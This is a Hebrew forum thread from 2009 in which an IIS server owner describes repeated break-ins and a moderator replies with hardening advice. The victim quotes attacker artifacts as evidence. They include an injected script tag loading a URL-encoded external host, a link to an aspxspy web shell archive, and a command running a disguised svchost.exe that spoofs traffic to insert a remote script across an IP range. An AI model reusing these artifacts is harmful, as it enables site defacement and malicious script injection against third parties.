לוגו אתר Fresh          

אפשרות תפריט  ראשי     אפשרות תפריט  צ'אט     אפשרות תפריט  מבזקים     אפשרות תפריט  צור קשר     חץ שמאלה חץ ימינה  

לך אחורה   לובי הפורומים > מחשבים > מערכות הפעלה
שמור לעצמך קישור לדף זה באתרי שמירת קישורים חברתיים
תגובה

כלי אשכול חפש באשכול זה

ישן 09-03-2009, 19:21
  mediali mediali אינו מחובר  

חבר מתאריך: 22.10.07
איך פרצו אלי לשרת 2003? למומחים

שלום בסוף שבוע האחרון - התחברתי בRDP לשרת 2003 שלי. וראיתי שמישהו הריץ שם סקריפט VB שמחפש את כל קבצי האינדקס של אתרי אינטרנט ומוסיף להם הפניה לקובץ JS. (אם זה מעניין מישהו אעלה את הקוד) לקח לי כמה שעות טובות למחוק את כל השורות האלה

אני יודע שהשינוי הזה נעשה ע"י שליטה מרחוק על השרת ולא בגישת FTP כי גם יש לי איזה מעקב שעוקב אחרי מי מתחבר לשרת וגם היוזר GUEST היה ENABLE

כמו כן בספרית WINDOWS מצאתי ספריה חדשה ששעת היצירה שלה היה כמה דקות אחרי הפריצה ובה CMD, SVHOST ועוד קובץ

אשמח אם מישהו יוכל להעיר את עיני - כיצד הם ביצעו את זה ?????
חייב לציין שהשרת לא עבר הקשחה - הפורט של RDP הוא הסטנדרטי, הפיירוול לא מופעל - אז אשמח למדריך שמסביר גם על צעדים מינימאליים כדי להגביר את האבטחה ?????

בתודה
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
ישן 13-03-2009, 14:26
  mediali mediali אינו מחובר  

חבר מתאריך: 22.10.07
שוב פרצו - עדכון
בתגובה להודעה מספר 4 שנכתבה על ידי קוביבי שמתחילה ב "כל הפעולות שציינת - ניתן..."

טוב האנטישמים האלה פרצו שוב לשרת - עליתי קצת על העקבות אבל לא בטוח איך הם עשו את זה - אז ככה :

שוב מצאתי בדפים הראשיים באתרים בIIS את ההפניה לסקריפט הבא :
<script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

שזה מעין תוכנת מנייה.

בחיפוש שעשיתי מצאתי בתוך אחד מספריות האתרים שיש לו הרשאת כתיבה (משמש את האתר להעלאת תמונות - חייב להיות פתוח לכתיבה) את הקוד שמתברר כ-aspxspy הנחמד הבא
http://www.lengmo.net/attachment/20...99_670704ac.rar
שככה"נ מאפשר להם לקבל הרבה יותר מידע על השרת ולהריץ באמצעות CMD סקריפטי VB
בחיבור RDP לשרת היה סשן פתוח (שלא עשו LOGOFF אלא רק סגרו) עם CMD פתוח ועליו קוד VB שרץ - הקוד הוא קוד שמחפש את כל קבצי האינדקס של אתרי אינטרנט מוסיף להם את הפניית ה-JS

היה גם קובץ BAT עם הקוד הבא

svchost.exe -idx 0 -ip 00.00.00.00-225.225.225.225 -port 80 -insert "<script language=javascript src=http://www.ebfonline.com/Images/img.gif></script>" -Interval 1000 -spoofmode 2

שינית את מספרי ה-IP

אשמח אם מישהו יוכל להעיר את עיני מה הקוד הזה אמור לעשות.

הדבר היחיד שעשיתי עד עכשיו זה להוריד את ההפניה שהם הכניסו בדפי האתרים באמצעות search&replace ולחסום את הספריות (ב-IIS) עם הרשאת כתיבה כך שלא אפשר להריץ מתוכם קוד.

אשמח מאוד לחוות דעתכם ולעזרכתם

נ.ב : בדקתי בקבצי הלוג לראות מי ניגש לקובץ שהועלה לספריה עם ההראשות כתיבה - יש לי את הIP שלו יש מה לעשות עם זה - הלוג כאן למטה :

2009-03-13 03:11:56 W3SVC944404638 IP ET /UserFiles/image/s/Code.aspx - 80 - 121.12.126.8 Mozilla/4.0+compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NE T+CLR+2.0.50727;+GreenBrowser) - 200 0 0 4001 348 11593
ישן 13-03-2009, 19:27
צלמית המשתמש של קוביבי
  משתמש זכר קוביבי מנהל קוביבי אינו מחובר  
מנהל פורום מערכות הפעלה - הרובע המייקרוסופטי.

חבר מתאריך: 07.10.04
LinkedIn profile
כמה דברים שתוכל לעשות ספציפית נגד הדברים שמצאת
בתגובה להודעה מספר 5 שנכתבה על ידי mediali שמתחילה ב "שוב פרצו - עדכון"

ציטוט:
במקור נכתב על ידי mediali
טוב האנטישמים האלה פרצו שוב לשרת - עליתי קצת על העקבות אבל לא בטוח איך הם עשו את זה - אז ככה :
הם לא בהכרח אנטישמים, הם לא מלאכים... אבל זו די אשמתך שהם פרצו ככה
ציטוט:
שוב מצאתי בדפים הראשיים באתרים בIIS את ההפניה לסקריפט הבא :
<script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

אתה צריך להסיר את ההפניות האלו ידנית, תדאג שלמשתמשים רגילים (= לא אתה) אסור יהיה לשנות את הקבצים ברמת ntfs, כדי לשנות את הקבצים תוריד את החסימה, תשנה את הקבצים ושים אותה מחדש.
ציטוט:
שזה מעין תוכנת מנייה.

עשית whois על הכתובת? אולי סתם רוצים הפניות לאתר כדי לתת לו PR גבוה? יכול להיות שלא באמת ניסו לדפוק אותך
ציטוט:
בחיפוש שעשיתי מצאתי בתוך אחד מספריות האתרים שיש לו הרשאת כתיבה (משמש את האתר להעלאת תמונות - חייב להיות פתוח לכתיבה) את הקוד שמתברר כ-aspxspy הנחמד הבא
http://www.lengmo.net/attachment/20...99_670704ac.rar

לא נכנסתי לקבצים ובדקתי אותם, אנטי וירוס מזהה אותם כווירוסים? מה יש בפנים? אתה משתמש ב aspx? אולי פשוט להוריד את האפשרות להריץ את הקבצים האלו יספיק לך?
ציטוט:
שככה"נ מאפשר להם לקבל הרבה יותר מידע על השרת ולהריץ באמצעות CMD סקריפטי VB

אתה משתמש בקבצי vbs או js על השרת?
אם לא אתה יכול לבטל את wscript ו cscript באמצעות מחיקה/שינוי שם/ביטול הרשאות read&execute לכולם מלבדך (או לכולם בכלל) ואז סקריפטים לא ירוצו על השרת.
ציטוט:

בחיבור RDP לשרת היה סשן פתוח (שלא עשו LOGOFF אלא רק סגרו) עם CMD פתוח ועליו קוד VB שרץ - הקוד הוא קוד שמחפש את כל קבצי האינדקס של אתרי אינטרנט מוסיף להם את הפניית ה-JS

למה יש לך גישת RDP אל השרת? מי המשתמשים שיכולים להתחבר? תעיף את כולם דרך terminal services configurations תחת כרטסת permissions, תדאג שרק משתמשים לא אדמיניסטרטיביים יוכלו להתחבר אליו, ותדאג שלמשתמשים האלו לא תהייה גישה לספריות של האתר בכלל.
ציטוט:
היה גם קובץ BAT עם הקוד הבא

svchost.exe -idx 0 -ip 00.00.00.00-225.225.225.225 -port 80 -insert "<script language=javascript src=http://www.ebfonline.com/Images/img.gif></script>" -Interval 1000 -spoofmode 2

שינית את מספרי ה-IP

אשמח אם מישהו יוכל להעיר את עיני מה הקוד הזה אמור לעשות.

חיפשתי קצת על הפקודה הזו, מסתבר שניסו לעשות לך spoofeattack (די ברור מהפקודה עצמה), קרא כאן להמשך:
http://isc.sans.org/diary.html?storyid=6001
ציטוט:
הדבר היחיד שעשיתי עד עכשיו זה להוריד את ההפניה שהם הכניסו בדפי האתרים באמצעות search&replace ולחסום את הספריות (ב-IIS) עם הרשאת כתיבה כך שלא אפשר להריץ מתוכם קוד.

אשמח מאוד לחוות דעתכם ולעזרכתם

דעתי - אתה חייב עזרה מקצועית, לא חסרות חברות שמתמחות באבטחה (אני מנוע מלהמליץ כדי שלא יראו בזה פרסום, מה-גם שאני לא מכיר את כולן ואת היכולות שלהן... אז כדאי שתחפש לבד), השאלה היא עד-כמה קריטי האתר שלך, האם הוא משהו פרטי, למטרות הכנסה, שייך לחברה גדולה וכו' (לא חייב לענות כאן - מובן בהחלט אם לא תרצה להגיד, אבל תחשוב כמה שווה לך העניין)

ציטוט:
נ.ב : בדקתי בקבצי הלוג לראות מי ניגש לקובץ שהועלה לספריה עם ההראשות כתיבה - יש לי את הIP שלו יש מה לעשות עם זה - הלוג כאן למטה :

2009-03-13 03:11:56 W3SVC944404638 IP ET /UserFiles/image/s/Code.aspx - 80 - 121.12.126.8 Mozilla/4.0+compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NE T+CLR+2.0.50727;+GreenBrowser) - 200 0 0 4001 348 11593

לא יעזור הרבה - בשנייה שתחסום אותו הוא יגלוש מפרוקסי אחר עם כתובת אחרת, אתה כן יכול להתלונן אצל הספק שלך בעניין (או במשטרה, אמורה להיות להם סוג של מחלקת עבירות טכנולוגיות או איך שהם לא קוראים לזה), מקווה שהפורץ היה לא זהיר ולא הסתיר את עצמו טוב מידי.

טוב, אני חושב שזהו כטיפול ראשוני, אני לא יודע אילו אמצעים של אבטחה יש לך... אבל כדאי לעבור על כל הנושא הזה אצלך (שוב, בהתאם לכמה שאתה תלוי באתר הזה).

תגובה

כלי אשכול חפש באשכול זה
חפש באשכול זה:

חיפוש מתקדם
מצבי תצוגה דרג אשכול זה
דרג אשכול זה:

מזער את תיבת המידע אפשרויות משלוח הודעות
אתה לא יכול לפתוח אשכולות חדשים
אתה לא יכול להגיב לאשכולות
אתה לא יכול לצרף קבצים
אתה לא יכול לערוך את ההודעות שלך

קוד vB פעיל
קוד [IMG] פעיל
קוד HTML כבוי
מעבר לפורום

כל הזמנים המוצגים בדף זה הם לפי איזור זמן GMT +2. השעה כעת היא 03:56

הדף נוצר ב 0.07 שניות עם 12 שאילתות

הפורום מבוסס על vBulletin, גירסא 3.0.6
כל הזכויות לתוכנת הפורומים שמורות © 2024 - 2000 לחברת Jelsoft Enterprises.
כל הזכויות שמורות ל Fresh.co.il ©

צור קשר | תקנון האתר